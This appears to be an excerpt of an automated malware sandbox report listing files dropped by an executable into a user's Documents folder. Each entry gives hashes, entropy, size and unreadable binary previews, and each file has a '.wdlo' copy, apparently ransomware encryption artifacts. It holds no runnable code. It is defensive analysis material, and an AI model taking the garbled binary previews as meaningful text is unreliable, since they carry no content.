                  SSDEEP:24:IONMuig+va7SncycHC5YL7D8Ixh87x9GncuZpoSEa0oLsmNrnVIC5Iyq5RdD3zbD:FzigX74cui8Ir8ycipA4smNr6C5lodDT
                  MD5:D2FD336F471D9F7F4ACEA3699F1BE4D3
                  SHA1:F48E65FF4DBBDCFFD7E346EB6F9EC832F531EDF3
                  SHA-256:F82BD22F59816C94D06B683EED5AFACBC2FCF2158F3BD89D3E17D94B8B4DB18E
                  SHA-512:30AED7D8D51C351D5D6D2484B6B61225B522C40C371C2246BFFCA284B99CA2B79E02DDD30AEC0B85262FAC4570ED274C0323FCE38AC26DFC68CC2B92AA7887DA
                  Malicious:false
                  Preview:BXAJUD*0...X.<%9..K.........+.^..."@t*.%Wqf.'.42CA.<.....Q'9..)h..A:1).h.~.W;...D.....K.....8..v..J...........<J.X...fq......5K....F4x.........jEY....DU.%..<..YV....U........c.o.K...q..5.<....."mp..'.=..Z)t.....v.n...8......8hi..,.fL.T..$...C.+..n.cx..&.6..._[....9s...wE..%..A...R*..E......g...q.O~..D.........t^]..q.zK?....f...k.......s.R.L..x.....I..0.......).D.B..es.{_.Ea`.0.;.2.......m..si..{w.Tvh.L.....2s..i.0.$.....V...$..@D....T..u$@"$...M.o....I"...h.H.ZSL..>D....t.....k.e.}.+...^7..[.g....Q"....,...M..Md.&..B..1..QS....s.5..Zm...]c.....y.......0.h.....&).....a......H.s.5.5...1.xD~w....^..;K..!T.f...w.vP.[.p...y.$.-.o..e..Z.....yc.......h..qA'.m..[..B2.y..!...F..E...7.*.1,x .4...L.N&...G..E..'..[a..W..F..y........D.....}....s[. wu(....W..n..r..'...........*..g. ..y>h...cb..E.P.J..@...\.....e...N..At..JXT....#r.as../w..P..CV....kS..U..[.L:..t............{N.Z.74.']r...D.......p...+....X...)..7...LE...m..;...q.S....kw6tW.Yv.

                  C:\Users\user\Documents\BXAJUJAOEO.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849480405909674
                  Encrypted:false
                  SSDEEP:24:IONMuig+va7SncycHC5YL7D8Ixh87x9GncuZpoSEa0oLsmNrnVIC5Iyq5RdD3zbD:FzigX74cui8Ir8ycipA4smNr6C5lodDT
                  MD5:D2FD336F471D9F7F4ACEA3699F1BE4D3
                  SHA1:F48E65FF4DBBDCFFD7E346EB6F9EC832F531EDF3
                  SHA-256:F82BD22F59816C94D06B683EED5AFACBC2FCF2158F3BD89D3E17D94B8B4DB18E
                  SHA-512:30AED7D8D51C351D5D6D2484B6B61225B522C40C371C2246BFFCA284B99CA2B79E02DDD30AEC0B85262FAC4570ED274C0323FCE38AC26DFC68CC2B92AA7887DA
                  Malicious:false
                  Preview:BXAJUD*0...X.<%9..K.........+.^..."@t*.%Wqf.'.42CA.<.....Q'9..)h..A:1).h.~.W;...D.....K.....8..v..J...........<J.X...fq......5K....F4x.........jEY....DU.%..<..YV....U........c.o.K...q..5.<....."mp..'.=..Z)t.....v.n...8......8hi..,.fL.T..$...C.+..n.cx..&.6..._[....9s...wE..%..A...R*..E......g...q.O~..D.........t^]..q.zK?....f...k.......s.R.L..x.....I..0.......).D.B..es.{_.Ea`.0.;.2.......m..si..{w.Tvh.L.....2s..i.0.$.....V...$..@D....T..u$@"$...M.o....I"...h.H.ZSL..>D....t.....k.e.}.+...^7..[.g....Q"....,...M..Md.&..B..1..QS....s.5..Zm...]c.....y.......0.h.....&).....a......H.s.5.5...1.xD~w....^..;K..!T.f...w.vP.[.p...y.$.-.o..e..Z.....yc.......h..qA'.m..[..B2.y..!...F..E...7.*.1,x .4...L.N&...G..E..'..[a..W..F..y........D.....}....s[. wu(....W..n..r..'...........*..g. ..y>h...cb..E.P.J..@...\.....e...N..At..JXT....#r.as../w..P..CV....kS..U..[.L:..t............{N.Z.74.']r...D.......p...+....X...)..7...LE...m..;...q.S....kw6tW.Yv.

                  C:\Users\user\Documents\GLTYDMDUST.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.85276959984893
                  Encrypted:false
                  SSDEEP:24:8Tk9sV1QhyOYzU/AmrOY7zYHptOe0QghovNI+VSBj7T3zbD:8TkZQeAmrOl3Jn6PT3nD
                  MD5:79CFE86BC509BD114BAF9FDCD1AD699E
                  SHA1:EB9247AEB7A395B033B1267FE907A08936D260B1
                  SHA-256:948ED4D225543E9F4C54BFB5450EA5F82BCC3C3CC93123A36BF264DE34D27494
                  SHA-512:1A255CB2ED93F2E8C411A41C6E635188EE86552FE27FB8EFC6DDFEE37E483BBAAEEBFA32281C921E0397AC2A0A831369F7764D60CDCAA25C714B990A48920963
                  Malicious:false
                  Preview:GLTYDI.W.....t..K..|g.P&B%.*=4..{O..^.a......^.N.,.'.....sF.t...K^.S....d...@W..y7g!....J..g&..p.F6y..}...O..pQ...5.....%^...V>2.....B.:.u..l.F*7.....2....c.6..h....<G./.. 5X.lO..?!....`.fb..x.Q.4._...!.un$..j..{.t..C$&.!....y.7.1....w.....%;z]...........s.3P_...*..@..........$.D|.^..{..F.u*.6O.....u.d{r.....N..M..d\l8...$.x...x.....Zk..K..5.|.......VU..Z.'./.=}.Y..0..~>%....r.H.s..6.SF..=...y.`.w..vL.?.Gb.9..?.^:g..........i'.y....K..d.<....4......\)....1;rh..R....9.Qo...k..D..TxD-.......+y...SJ.........$-.n7........S.^..P.......r..T.....C..)...&l.qG.`.......pY.!......!..9.....\Wx........).^DG3~....fOJm.....)B...%..`+%.^_.....~..$(q>n'.Vx..i.......-....s.....&......-s#.....SP:b9......W..?.......M.......>..3.g.....7..)... 8.a#...@.74*.m.K....l..I~; F....R......4...^R.8h{.n]1j]^..T....<.._.y........../W..O..H.@...., 5........(...xF..ja.......n.....E~.?.O@......<m.!.3. .v.G........:.z.I3:.....xd=C..4.[.V.F..s]..v...qex...p.{...P~...A:..

                  C:\Users\user\Documents\GLTYDMDUST.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.85276959984893
                  Encrypted:false
                  SSDEEP:24:8Tk9sV1QhyOYzU/AmrOY7zYHptOe0QghovNI+VSBj7T3zbD:8TkZQeAmrOl3Jn6PT3nD
                  MD5:79CFE86BC509BD114BAF9FDCD1AD699E
                  SHA1:EB9247AEB7A395B033B1267FE907A08936D260B1
                  SHA-256:948ED4D225543E9F4C54BFB5450EA5F82BCC3C3CC93123A36BF264DE34D27494
                  SHA-512:1A255CB2ED93F2E8C411A41C6E635188EE86552FE27FB8EFC6DDFEE37E483BBAAEEBFA32281C921E0397AC2A0A831369F7764D60CDCAA25C714B990A48920963
                  Malicious:false
                  Preview:GLTYDI.W.....t..K..|g.P&B%.*=4..{O..^.a......^.N.,.'.....sF.t...K^.S....d...@W..y7g!....J..g&..p.F6y..}...O..pQ...5.....%^...V>2.....B.:.u..l.F*7.....2....c.6..h....<G./.. 5X.lO..?!....`.fb..x.Q.4._...!.un$..j..{.t..C$&.!....y.7.1....w.....%;z]...........s.3P_...*..@..........$.D|.^..{..F.u*.6O.....u.d{r.....N..M..d\l8...$.x...x.....Zk..K..5.|.......VU..Z.'./.=}.Y..0..~>%....r.H.s..6.SF..=...y.`.w..vL.?.Gb.9..?.^:g..........i'.y....K..d.<....4......\)....1;rh..R....9.Qo...k..D..TxD-.......+y...SJ.........$-.n7........S.^..P.......r..T.....C..)...&l.qG.`.......pY.!......!..9.....\Wx........).^DG3~....fOJm.....)B...%..`+%.^_.....~..$(q>n'.Vx..i.......-....s.....&......-s#.....SP:b9......W..?.......M.......>..3.g.....7..)... 8.a#...@.74*.m.K....l..I~; F....R......4...^R.8h{.n]1j]^..T....<.._.y........../W..O..H.@...., 5........(...xF..ja.......n.....E~.?.O@......<m.!.3. .v.G........:.z.I3:.....xd=C..4.[.V.F..s]..v...qex...p.{...P~...A:..

                  C:\Users\user\Documents\GLTYDMDUST\AQRFEVRTGL.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846058114259433
                  Encrypted:false
                  SSDEEP:24:VWkN0rmJDajatk169ag6LA4c6PRzA7E1jKyyzjyVcp5/c3zbD:VBN06Ju+y16wg6HPR0KKjzjQcpO3nD
                  MD5:F2E6600FD38BFF4DAC811E83F5D63EC3
                  SHA1:492D3BC06522C0E7C03F9952BF1D109F450A4EAA
                  SHA-256:869BE2DD223C13E703ED07729951DF1A56F34E04FD82F0250D89EFB7B8240E69
                  SHA-512:C5C2B1E4F479357523771C0FDCFB1D71F4F6E80546E15894E879AA9CA952045ADDC93A98A2792F0B35F821ACDB63EED763EDEABEE991BC00FA231033FDBF6F86
                  Malicious:false
                  Preview:AQRFE.).z.n.Q..A]...#....6,?..7..[...O'........^..Ey5Y.L......,../..a..|x....ma}.{.....`...f.@@.`.Ml....`]n;S.n;....v^.g..n9........-..@.e.P..%...<..J\K/..=?.?....(.4......).sm.a...m,...........S.c.`....H/p...T...<.d..(e.N..r.C/....1.vD.W...4._.......B.....Sk.Y...S...~...z.......E..3.........9:lVO.....V`1.@.....!.{p......{.v....Q.J.....g.dB:.).i.eeW..k...m_dxd.|!K?4.sn-2...8.....!........H....YJ....L.MA.!...j...>..u._.MN..*..z..g...dX......w...}.gj]*..._z.v.A0...!.V..u.X.^WT.:.o_-.VIJ Oz...W...d.f.o.........*...5P.......;...CP..6..1.......9.v.....2.oN..>..<.R.}..P..x.j..y@Zyx....jxj.#......<.l.%...<."*......2.A........}E......$L...}.&k%+b........(q...........F9......3.RWQ.!...y<$...vt. #..hl..`~H...Q..x.RG..u.x.VTZ.....3.2..E...8.... .....b.O....{L...=.5.s:...'..n......7m$.F.+...2.E.Bo....]..F.....u.A%)..c....R........y.."Ug...{..u...z`JKvS.....B...C..Q.......X*......&.o...6...x...8c.V.wi|..,{........~....y.....V....O......}/

                  C:\Users\user\Documents\GLTYDMDUST\AQRFEVRTGL.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.846058114259433
                  Encrypted:false
                  SSDEEP:24:VWkN0rmJDajatk169ag6LA4c6PRzA7E1jKyyzjyVcp5/c3zbD:VBN06Ju+y16wg6HPR0KKjzjQcpO3nD
                  MD5:F2E6600FD38BFF4DAC811E83F5D63EC3
                  SHA1:492D3BC06522C0E7C03F9952BF1D109F450A4EAA
                  SHA-256:869BE2DD223C13E703ED07729951DF1A56F34E04FD82F0250D89EFB7B8240E69
                  SHA-512:C5C2B1E4F479357523771C0FDCFB1D71F4F6E80546E15894E879AA9CA952045ADDC93A98A2792F0B35F821ACDB63EED763EDEABEE991BC00FA231033FDBF6F86
                  Malicious:false
                  Preview:AQRFE.).z.n.Q..A]...#....6,?..7..[...O'........^..Ey5Y.L......,../..a..|x....ma}.{.....`...f.@@.`.Ml....`]n;S.n;....v^.g..n9........-..@.e.P..%...<..J\K/..=?.?....(.4......).sm.a...m,...........S.c.`....H/p...T...<.d..(e.N..r.C/....1.vD.W...4._.......B.....Sk.Y...S...~...z.......E..3.........9:lVO.....V`1.@.....!.{p......{.v....Q.J.....g.dB:.).i.eeW..k...m_dxd.|!K?4.sn-2...8.....!........H....YJ....L.MA.!...j...>..u._.MN..*..z..g...dX......w...}.gj]*..._z.v.A0...!.V..u.X.^WT.:.o_-.VIJ Oz...W...d.f.o.........*...5P.......;...CP..6..1.......9.v.....2.oN..>..<.R.}..P..x.j..y@Zyx....jxj.#......<.l.%...<."*......2.A........}E......$L...}.&k%+b........(q...........F9......3.RWQ.!...y<$...vt. #..hl..`~H...Q..x.RG..u.x.VTZ.....3.2..E...8.... .....b.O....{L...=.5.s:...'..n......7m$.F.+...2.E.Bo....]..F.....u.A%)..c....R........y.."Ug...{..u...z`JKvS.....B...C..Q.......X*......&.o...6...x...8c.V.wi|..,{........~....y.....V....O......}/

                  C:\Users\user\Documents\GLTYDMDUST\GLTYDMDUST.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.853673412010228
                  Encrypted:false
                  SSDEEP:24:iBzIRVHORqkKl1jdLZnTWKYiTx+lxgG6xafv5ouiPBQ2+Sx3zbD:iBzihkKlxTThVGJnGuwHx3nD
                  MD5:133B21F9EE0851C1AB664E5ABA6F4992
                  SHA1:508C09EA59ACBB9DB28AA05F318C0A28DCAEEBD6
                  SHA-256:E17964A63E1322ED7CEC8B4E04428D7DE120A95D80AD27593BED64E96874F361
                  SHA-512:1CC48A4199B51CE7213150668DABB9C32AA17BC8C194BF1EEC653695856043BBBED695F20D3A035084C70E1678EAD8F6D760372D4329183CB1045B4346BB8528
                  Malicious:false
                  Preview:GLTYDs.JG.u.f.......E0$.E>x...%Q...|...U-.ga.2(5_..w...'..E/../.bR_?.9"....B.Sj..h.v.>.....r.I..y.{]...rLE.....3R...+.........(.+..$.F...E.U......g/..v.?....(;....~...a....k$.%w..^.=.(.K.].A\&..n....{$mwl.. .K.L[q....i<......'...;8....(.......E.m.......d.[k.3...c..3.#.Y........)...d.H.H...p;......7k+.qN.k.W}.r.a.a[...?`}.R..;..-...I..%...^(qyq3.!d..g........k.u..um..Q...D..-....t.#.e..7..z.y.s8ba...D-.'%s..L.w...2,..(...../..D+?1A..?.qv??..S...S..*B.}..e.z(;.fr.q....J..o"L}!.\.N...S.].]..{....M."..\(Q..+K...K.....aW.'.4^(.0^.=<..!...... ..6.M.k}.J...........A.....Xy....F...b...^.&jO.wS$@.}..8....H.......W>s.aM2.6...=.z.T.n.q...C..K....UG.d<{....x.....%..........4......x2....E].aoiJ.K@`.8...a.$.i$...DI...P.A...^.v.%d......}.......P.Y.a.D.p_.].D.WP........7..T._Q....T...t..2.....ZsL.0.j.Y"..f.....^......}dP.v.....F.L..=...q.x.>].!7..#.....N.cR".E...5&.........t.\9.`...A....X..;\g..?j.F.. U.-Y,..6\.H&.....z;..%5.d~K.e..;<9...F.L......|B...d....=l

                  C:\Users\user\Documents\GLTYDMDUST\GLTYDMDUST.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.853673412010228
                  Encrypted:false
                  SSDEEP:24:iBzIRVHORqkKl1jdLZnTWKYiTx+lxgG6xafv5ouiPBQ2+Sx3zbD:iBzihkKlxTThVGJnGuwHx3nD
                  MD5:133B21F9EE0851C1AB664E5ABA6F4992
                  SHA1:508C09EA59ACBB9DB28AA05F318C0A28DCAEEBD6
                  SHA-256:E17964A63E1322ED7CEC8B4E04428D7DE120A95D80AD27593BED64E96874F361
                  SHA-512:1CC48A4199B51CE7213150668DABB9C32AA17BC8C194BF1EEC653695856043BBBED695F20D3A035084C70E1678EAD8F6D760372D4329183CB1045B4346BB8528
                  Malicious:false
                  Preview:GLTYDs.JG.u.f.......E0$.E>x...%Q...|...U-.ga.2(5_..w...'..E/../.bR_?.9"....B.Sj..h.v.>.....r.I..y.{]...rLE.....3R...+.........(.+..$.F...E.U......g/..v.?....(;....~...a....k$.%w..^.=.(.K.].A\&..n....{$mwl.. .K.L[q....i<......'...;8....(.......E.m.......d.[k.3...c..3.#.Y........)...d.H.H...p;......7k+.qN.k.W}.r.a.a[...?`}.R..;..-...I..%...^(qyq3.!d..g........k.u..um..Q...D..-....t.#.e..7..z.y.s8ba...D-.'%s..L.w...2,..(...../..D+?1A..?.qv??..S...S..*B.}..e.z(;.fr.q....J..o"L}!.\.N...S.].]..{....M."..\(Q..+K...K.....aW.'.4^(.0^.=<..!...... ..6.M.k}.J...........A.....Xy....F...b...^.&jO.wS$@.}..8....H.......W>s.aM2.6...=.z.T.n.q...C..K....UG.d<{....x.....%..........4......x2....E].aoiJ.K@`.8...a.$.i$...DI...P.A...^.v.%d......}.......P.Y.a.D.p_.].D.WP........7..T._Q....T...t..2.....ZsL.0.j.Y"..f.....^......}dP.v.....F.L..=...q.x.>].!7..#.....N.cR".E...5&.........t.\9.`...A....X..;\g..?j.F.. U.-Y,..6\.H&.....z;..%5.d~K.e..;<9...F.L......|B...d....=l

                  C:\Users\user\Documents\GLTYDMDUST\HMPPSXQPQV.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.84828180005768
                  Encrypted:false
                  SSDEEP:24:jinnf+bEZPzWRCIllLtKew5HhSe8E1/1Ui/MMjQkICii33zbD:GneEZqJRKt5HhSep1/11MkL3nD
                  MD5:4DADF05E787B5E2D9ABB5C63991F936D
                  SHA1:D62286B24D5091D4BF985A113497899AA7A1B8B3
                  SHA-256:644B935ECF2619A26753F8389DBBF3852434E000BBC24763CB09899B9A2319DB
                  SHA-512:AD7364C461B9AC4F63112B7CAA43BEBE0344963E035E24211CA4DC132ED62227B513925B721D486F479538A6AB5ADB8402E8EE55A418BC7FBB531F08DBF6C1AB
                  Malicious:false
                  Preview:HMPPS.w.....pG.L.e..{..]....=.\?.`......@..@J....uc$.vV]*.:...jy.Q..f=.dL..d.~.)I.....(g;*<...8..e.V..t..b..&/.W~...//...VrN......0ru.S^.!.......7NV...U.*./....E....XI..O".F..~H....#.c..H..........Y.e.....s.Lf..-.b..^\.Q.f4.ow.q..7.....|.|...*?......D.iK.!.Bw`?E..d..i.....$.....X8.a......d.L.C..Q..8.. ...x9.z...\.C..L..j`...0.5....M..Q]....w....P.#...`g's.W.&.....6...~F........b]L...L\$.,../.'rM[..9oj.A(..B...u...c.IN.IN.!.m."...vK~.O.....P.....D.sc.A}.r.7....H......B.....S./i5s.....{*,.d_.^>.*E...}.f..2.C.`T.k.\..;............t.ta..x.v.N....+.T.5.s.J.-.)..,.."v1..........+.d...<.......^.........q...+........d.fx>.I)9..Go.e.O.}.3m.....r.P.q...D_fW.....-..].L..W....6.........i&jD....tE...q(.t..t.&Eqb..Q.]D.0.2l.w..,..z1..%-..@._.g..0..h.~.....z@...!..X_............*"..%...........)..z"..v.H.]..u._#.4.m9..*.N..f^..uK:.....Y ..~..........^..8.(..gV@...T;.bp...2(.H..@T...rCL8z..6RN...wu $.g?. ...q.e.g.ji'.D..Ob.Y<(.R....}+...o..w.].6f

                  C:\Users\user\Documents\GLTYDMDUST\HMPPSXQPQV.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.84828180005768
                  Encrypted:false
                  SSDEEP:24:jinnf+bEZPzWRCIllLtKew5HhSe8E1/1Ui/MMjQkICii33zbD:GneEZqJRKt5HhSep1/11MkL3nD
                  MD5:4DADF05E787B5E2D9ABB5C63991F936D
                  SHA1:D62286B24D5091D4BF985A113497899AA7A1B8B3
                  SHA-256:644B935ECF2619A26753F8389DBBF3852434E000BBC24763CB09899B9A2319DB
                  SHA-512:AD7364C461B9AC4F63112B7CAA43BEBE0344963E035E24211CA4DC132ED62227B513925B721D486F479538A6AB5ADB8402E8EE55A418BC7FBB531F08DBF6C1AB
                  Malicious:false
                  Preview:HMPPS.w.....pG.L.e..{..]....=.\?.`......@..@J....uc$.vV]*.:...jy.Q..f=.dL..d.~.)I.....(g;*<...8..e.V..t..b..&/.W~...//...VrN......0ru.S^.!.......7NV...U.*./....E....XI..O".F..~H....#.c..H..........Y.e.....s.Lf..-.b..^\.Q.f4.ow.q..7.....|.|...*?......D.iK.!.Bw`?E..d..i.....$.....X8.a......d.L.C..Q..8.. ...x9.z...\.C..L..j`...0.5....M..Q]....w....P.#...`g's.W.&.....6...~F........b]L...L\$.,../.'rM[..9oj.A(..B...u...c.IN.IN.!.m."...vK~.O.....P.....D.sc.A}.r.7....H......B.....S./i5s.....{*,.d_.^>.*E...}.f..2.C.`T.k.\..;............t.ta..x.v.N....+.T.5.s.J.-.)..,.."v1..........+.d...<.......^.........q...+........d.fx>.I)9..Go.e.O.}.3m.....r.P.q...D_fW.....-..].L..W....6.........i&jD....tE...q(.t..t.&Eqb..Q.]D.0.2l.w..,..z1..%-..@._.g..0..h.~.....z@...!..X_............*"..%...........)..z"..v.H.]..u._#.4.m9..*.N..f^..uK:.....Y ..~..........^..8.(..gV@...T;.bp...2(.H..@T...rCL8z..6RN...wu $.g?. ...q.e.g.ji'.D..Ob.Y<(.R....}+...o..w.].6f

                  C:\Users\user\Documents\GLTYDMDUST\LFOPODGVOH.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.841690424880035
                  Encrypted:false
                  SSDEEP:24:gWL4s9TP6FPyr2lkcSyvsnTHGC1MEAMn8bOqB9qGhHX75qyQIvpJAZRwCm3zbD:gWL4yTCFTltf6B1rAMn8bOqB9hpbQIvJ
                  MD5:0D09B04DC72579A718E55B7A10CC771F
                  SHA1:70A7DBB5489820BE1F0C90743BBF6A5590A4080B
                  SHA-256:04A75A9EAF5FBCAE2DAB7019A614C257410221338EA22994C2FFA493BAB642F5
                  SHA-512:9D5E1F7E97B8FC014424C4C9C9FFD49FC29D753AF9D4819FD52C2330E2D231C43AE8A9087A89BD63C17797E3D81DF588AFB57B5DFA8DEC5B2B6AAAE8759BBF82
                  Malicious:false
                  Preview:LFOPO..a...l..E..=...,...._......ZK.S....n...: I5......K.....whP...a1@.e.#.G..&.>..{....pq..DI......v.@....i.....&.C.b`..)..|...2m.i&..U..OZ...U..m...;.n..*.0.h......Q..P...[%..JH.$i9..*.....p|..<.k.Xn. .\.!.D..&..s...q.#z...jt..{*u..Au.yyv.$...Pcn..!.Y.[...C.xw{4...z...)..F.B(..Yi...c....`2.1W+...........\h'.....B.w.@...3.c..O6.;.....kE...R.u..I...&.N.....)..+j~...h...o.H.-"t..af...mk.+..._r.m.i..d..}..E]..h.._.....:#;\xD..b.P.3*..i.1.E4$D.N.I.....K....C..2....$.>..\.1..6q...p.........*`.....R58..D.~)......9..&@....h...,..|.E..J..Z.."w(..)..v....5.e3.@..6@.m.B.z..^.6.(..F^P.{.k9jn.....ws.......+.E.eB\N+.....Sz.....m.....9..6.J...%O....F./T...j.8...'Cf.........IP.P%j..=..s..u}zbf...dk. .ui$.v...!..9-..i....B.[zb..s;TJWw.&W.. ...2..IM..; l;.r}.s....<#..I..lUa.N`|m.Q...-e2.6...,.H.Y.!]36..3Af.4Z....,.....g...`M.......v.......+uB..8.......VCM..O.(...6..C..;..=y.........i(u..-.i...}O",..o". ...6h.J~....L=.(G...2.2.N...=.....

                  C:\Users\user\Documents\GLTYDMDUST\LFOPODGVOH.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.841690424880035
                  Encrypted:false
                  SSDEEP:24:gWL4s9TP6FPyr2lkcSyvsnTHGC1MEAMn8bOqB9qGhHX75qyQIvpJAZRwCm3zbD:gWL4yTCFTltf6B1rAMn8bOqB9hpbQIvJ
                  MD5:0D09B04DC72579A718E55B7A10CC771F
                  SHA1:70A7DBB5489820BE1F0C90743BBF6A5590A4080B
                  SHA-256:04A75A9EAF5FBCAE2DAB7019A614C257410221338EA22994C2FFA493BAB642F5
                  SHA-512:9D5E1F7E97B8FC014424C4C9C9FFD49FC29D753AF9D4819FD52C2330E2D231C43AE8A9087A89BD63C17797E3D81DF588AFB57B5DFA8DEC5B2B6AAAE8759BBF82
                  Malicious:false
                  Preview:LFOPO..a...l..E..=...,...._......ZK.S....n...: I5......K.....whP...a1@.e.#.G..&.>..{....pq..DI......v.@....i.....&.C.b`..)..|...2m.i&..U..OZ...U..m...;.n..*.0.h......Q..P...[%..JH.$i9..*.....p|..<.k.Xn. .\.!.D..&..s...q.#z...jt..{*u..Au.yyv.$...Pcn..!.Y.[...C.xw{4...z...)..F.B(..Yi...c....`2.1W+...........\h'.....B.w.@...3.c..O6.;.....kE...R.u..I...&.N.....)..+j~...h...o.H.-"t..af...mk.+..._r.m.i..d..}..E]..h.._.....:#;\xD..b.P.3*..i.1.E4$D.N.I.....K....C..2....$.>..\.1..6q...p.........*`.....R58..D.~)......9..&@....h...,..|.E..J..Z.."w(..)..v....5.e3.@..6@.m.B.z..^.6.(..F^P.{.k9jn.....ws.......+.E.eB\N+.....Sz.....m.....9..6.J...%O....F./T...j.8...'Cf.........IP.P%j..=..s..u}zbf...dk. .ui$.v...!..9-..i....B.[zb..s;TJWw.&W.. ...2..IM..; l;.r}.s....<#..I..lUa.N`|m.Q...-e2.6...,.H.Y.!]36..3Af.4Z....,.....g...`M.......v.......+uB..8.......VCM..O.(...6..C..;..=y.........i(u..-.i...}O",..o". ...6h.J~....L=.(G...2.2.N...=.....

                  C:\Users\user\Documents\GLTYDMDUST\LIJDSFKJZG.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.870557487601308
                  Encrypted:false
                  SSDEEP:24:6Z7B8bkcGMcozPFF+2oiRfUoVFcKk2MfcBZHCJDjNRh/B/FcobYULLvLvs1JGI7/:kBmkPtoz94RyfUNfyCTBtR8SLvuGI7ey
                  MD5:E515057F61A6C130986B0F7A37851262
                  SHA1:D129EBF1D8BCACD8A9039830DC25CEE05B8F8BE9
                  SHA-256:738381579888F84D7E0AFC5E609761B27ECCEC4A82FFB4B285443C6492DD651E
                  SHA-512:F53D6E6EEB63572090C905198B0D573F9C8536B48E2BE81A5BF9579A45D41B230DFDC5756F9169B20A430DF711344D42DE3292B677DFA16C480367ED4E7D837B
                  Malicious:false
                  Preview:LIJDS......]e]b.]....m.;....9.^..#...F.amv.W.$%...^T..{?..<....sF..'......0.&KI.%p.;?...y...h.....hoR....sa...>..=.n,......S......-.h...!.c.X...`$.y.,a.}._.=h..d...4.@.}...n.;...#.I.....fc.'.I.p........\e.....h...CQ.......>a#bN..q..DuJ*R.F..=ic..-S.f...n....wY...pGL...-..z0..S...Zu......4m..DQGZ....".cC.Aa.WoqIU.z.XA........5cQ.o....N,Bc..,....4.h.|.7.5s....\..)p ...l|*.t(..cX.r.B.~.....2.2&g....[....Ay..:}R.b.....f.......}s.o....A........Kv_....e.&.T....Y.W...C.2...L......f.....>..tmH.........]<....T.jF..O...t\.U7<D>..#TC...%..E.....^*.G.I...IN...z.0..F.C.J....Xj..l...~._...t.....s...{.........A..$....u.......9..=..A.Z..|.^.`...#E^....;.X..DO..d....+...*...gbE...Lv....+.g........+.'...N.A...9k..PJw.P....R......>.....#...qN.....:.b.....5....H.....V\......<.&.,.....v....G.+f6.Y.4{..(-....mu...J ..=..[`M......K"...0V=.._Dk.[..GWA......_2T"....e.+.Iun[/}...:.c_).U.L#..}.in..fo.b......`7..X...|.v.......<../p...j?Bg?...y.}Y\".m.....T

                  C:\Users\user\Documents\GLTYDMDUST\LIJDSFKJZG.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.870557487601308
                  Encrypted:false
                  SSDEEP:24:6Z7B8bkcGMcozPFF+2oiRfUoVFcKk2MfcBZHCJDjNRh/B/FcobYULLvLvs1JGI7/:kBmkPtoz94RyfUNfyCTBtR8SLvuGI7ey
                  MD5:E515057F61A6C130986B0F7A37851262
                  SHA1:D129EBF1D8BCACD8A9039830DC25CEE05B8F8BE9
                  SHA-256:738381579888F84D7E0AFC5E609761B27ECCEC4A82FFB4B285443C6492DD651E
                  SHA-512:F53D6E6EEB63572090C905198B0D573F9C8536B48E2BE81A5BF9579A45D41B230DFDC5756F9169B20A430DF711344D42DE3292B677DFA16C480367ED4E7D837B
                  Malicious:false
